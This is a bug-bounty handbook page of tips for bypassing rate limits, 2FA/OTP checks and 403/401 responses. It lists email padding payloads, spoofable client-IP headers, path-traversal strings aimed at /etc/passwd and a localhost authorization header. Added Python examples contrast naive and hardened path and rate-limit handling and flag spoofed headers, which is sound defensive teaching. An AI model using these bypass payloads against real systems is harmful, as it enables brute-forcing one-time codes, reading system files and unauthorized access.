Bug Hunter Handbook
Rate Limit Bypass / 2FA / OTP Bypass
Last updated 3 years ago
  • Want to bypass a rate limit? Try appending a null or whitespace payload (%00, %0d%0a, %09, %0C, %20, %0) to the email. Doesn't work? Try adding a blank space to the email instead; that works too.

Client-IP headers to try (IP stands for the address placed in the header):

X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwarded-Host: IP
True-Client-IP: IP
X-Real-IP: IP

Bug Bounty Technique:

GET /page.php?path=../../etc/passwd

403 Forbidden? Try one of these:

(1) ../../../etc/passwd%00
(2) ....//....//....//etc/passwd
(3) %252e%252e%252fetc%252fpasswd
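The three variants above each target a different weakness in how a server filters the path: a NUL byte truncates the string in C and legacy runtimes, "....//" survives a single non-recursive deletion of "../", and double encoding gets past a check that runs before a second decode. The Python below is an added example, not the handbook's code: it puts a naive "strip ../" resolver beside a containment check that decodes exactly once, refuses NUL bytes and leftover percent-encoding, and only serves paths whose real location stays inside the base directory. The base directory and file names are constructed for the demonstration.

```python
"""Path traversal: a naive "strip ../" filter beside a containment check.
Added example, not from the handbook; base directory and file names are
constructed for the demonstration."""
import os
from urllib.parse import unquote


def weak_resolve(base, user_path):
    """Naive: URL-decode, delete "../" once, join. The "....//" variant from
    the list above collapses back into "../" after the single deletion."""
    decoded = unquote(user_path)
    cleaned = decoded.replace("../", "")
    return os.path.normpath(os.path.join(base, cleaned))


def hardened_resolve(base, user_path):
    """Return the real path to serve, or None if the request must be refused.
    Decodes exactly once, refuses NUL bytes and leftover percent-encoding
    (double encoding), then checks the resolved path stays inside `base`."""
    base = os.path.realpath(base)
    decoded = unquote(user_path)
    if "\x00" in decoded:             # %00: truncation in C / legacy runtimes
        return None
    if "%" in decoded:                # %252e...: a second decode would yield ../
        return None
    candidate = os.path.realpath(os.path.join(base, decoded))
    if candidate != base and not candidate.startswith(base + os.sep):
        return None                   # ../ or a symlink escaping the base
    return candidate


def escapes_base(base, resolved):
    """True when a resolved path lies outside `base` (audits the naive version)."""
    base = os.path.realpath(base)
    return not (resolved == base or resolved.startswith(base + os.sep))


# The three bypass variants listed above.
TRAVERSAL_VARIANTS = [
    "../../../etc/passwd%00",
    "....//....//....//etc/passwd",
    "%252e%252e%252fetc%252fpasswd",
]

if __name__ == "__main__":
    base = "/srv/app/files"           # constructed base directory
    for variant in TRAVERSAL_VARIANTS:
        print(f"{variant:32} weak -> {weak_resolve(base, variant)}")
        print(f"{'':32} hardened -> {hardened_resolve(base, variant)}")
    print("legit ->", hardened_resolve(base, "reports/2024.txt"))
```

Note that the containment check does not need to recognise the "....//" pattern at all: once decoded and resolved it is just an odd file name inside the base directory, and a lookup there fails harmlessly, whereas the naive version turns it into /etc/passwd.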

I just happened to be able to bypass a 2FA in place during a recent engagement, and this was how I did it. The last /setup/ endpoint was as the attacker, while the first one was as the victim.

X-Forwarded-Origin: 127.0.0.1

2FA:

https://shahmeeramir.com/4-methods-to-bypass-two-factor-authentication-2b0075d9eb5f
How to find authentication bypass vulnerabilities. Focus: I added headers.
Request: GET /delete?user=test HTTP/1.1
Response: HTTP/1.1 401 Unauthorized
Request: GET /delete?user=test HTTP/1.1 with X-Custom-IP-Authorization: 127.0.0.1
Response: HTTP/1.1 302 Found
#bugbounty #bugbountytips
https://blog.cobalt.io/bypassing-the-protections-mfa-bypass-techniques-for-the-win-8ef6215de6ab
https://notifybugme.medium.com/unauthorized-access-to-admin-setpassword-page-by-bypass-403-forbidden-f10bbb92ab35
Every time you face a 401 Unauthorized response, add this header to the request: X-Custom-IP-Authorization: 127.0.0.1 #bugbountytips
https://mazoka777.medium.com/two-factor-authentication-bypass-4c814627f8c3
https://medium.com/@huzaifa_tahir/methods-to-bypass-rate-limit-5185e6c67ecd
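Both tricks on this page, the padded email from the first bullet and the client-IP header list (together with X-Forwarded-Origin and X-Custom-IP-Authorization from the 2FA and 401 notes above), work because the server derives its identity key from values the client controls. The Python below is an added example, not the handbook's code: a weak rate-limit keying function beside a hardened one, a fixed-window limiter to run them through, and a check that flags requests carrying any of those headers so they can be logged or alerted on. The header names come from this page; the function names, the trusted-proxy handling and the sample attempts are constructed.

```python
"""Rate limiting on login / OTP endpoints: a weak keying function beside a
hardened one, plus a check for spoofable client-IP headers.
Added example; the header names come from this page, everything else
(function names, trusted-proxy handling, sample attempts) is constructed."""
import unicodedata
from collections import defaultdict

# Client-IP headers listed on this page. Any client can send them, so a limiter
# or an authorization check must not trust them unless a trusted proxy set them.
SPOOFABLE_IP_HEADERS = frozenset({
    "x-originating-ip", "x-forwarded-for", "x-remote-ip", "x-remote-addr",
    "x-client-ip", "x-host", "x-forwarded-host", "true-client-ip", "x-real-ip",
    "x-forwarded-origin", "x-custom-ip-authorization",
})


def spoofable_headers_present(headers):
    """Return the spoofable IP headers found in a request (for logging/alerting)."""
    return sorted(name for name in headers if name.lower() in SPOOFABLE_IP_HEADERS)


def normalize_email(email):
    """Canonicalise the email before it becomes part of a rate-limit key.
    Drops whitespace and control characters (what %20, %09, %0C, %0d%0a and
    %00 become once URL-decoded), folds compatibility forms and lowercases."""
    email = unicodedata.normalize("NFKC", email)
    email = "".join(ch for ch in email if ord(ch) > 0x20 and not ch.isspace())
    return email.lower()


def weak_key(headers, peer_ip, email):
    """Weak: trusts whichever spoofable header is present and uses the raw email."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in ("x-forwarded-for", "x-real-ip", "true-client-ip"):
        if name in lowered:
            return (lowered[name].split(",")[0].strip(), email)
    return (peer_ip, email)


def hardened_key(headers, peer_ip, email, trusted_proxies=frozenset()):
    """Hardened: honour X-Forwarded-For only when the TCP peer is a trusted
    proxy, and then take the address that proxy appended (the last entry);
    otherwise the TCP peer address is the client. The email is normalised."""
    lowered = {k.lower(): v for k, v in headers.items()}
    client_ip = peer_ip
    if peer_ip in trusted_proxies and "x-forwarded-for" in lowered:
        client_ip = lowered["x-forwarded-for"].split(",")[-1].strip()
    return (client_ip, normalize_email(email))


class RateLimiter:
    """Fixed-window counter: at most `limit` attempts per key."""

    def __init__(self, limit):
        self.limit = limit
        self.counts = defaultdict(int)

    def allow(self, key):
        self.counts[key] += 1
        return self.counts[key] <= self.limit


# Constructed sample: six OTP attempts against one account from one TCP peer,
# each rotating the spoofed header value or padding the email differently.
SAMPLE_ATTEMPTS = [
    ({"X-Forwarded-For": "10.0.0.1"}, "203.0.113.9", "victim@example.com"),
    ({"X-Forwarded-For": "10.0.0.2"}, "203.0.113.9", "victim@example.com"),
    ({"X-Real-IP": "10.0.0.3"}, "203.0.113.9", "victim@example.com"),
    ({"True-Client-IP": "10.0.0.4"}, "203.0.113.9", "victim@example.com "),
    ({}, "203.0.113.9", "victim@example.com\t"),
    ({}, "203.0.113.9", "\x00victim@example.com"),
]


def count_allowed(key_fn, attempts=SAMPLE_ATTEMPTS, limit=3):
    """Run the attempts through a fresh limiter; return how many got through."""
    limiter = RateLimiter(limit)
    return sum(1 for headers, peer_ip, email in attempts
               if limiter.allow(key_fn(headers, peer_ip, email)))


if __name__ == "__main__":
    print("weak    :", count_allowed(weak_key), "of 6 attempts allowed")
    print("hardened:", count_allowed(hardened_key), "of 6 attempts allowed")
    for headers, _, _ in SAMPLE_ATTEMPTS:
        flagged = spoofable_headers_present(headers)
        if flagged:
            print("flag for review:", flagged)
```

With the limit set to three, the weak key sees six different identities and lets every attempt through, while the hardened key collapses them into one identity and blocks the last three. The same `spoofable_headers_present` check is worth running in the WAF or access log pipeline: a request from outside the proxy tier that carries X-Custom-IP-Authorization or X-Forwarded-For is a strong signal of the probing described in the tweets above.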
GitHub: aufzayed/bugbounty, 403-bypass directory (main branch)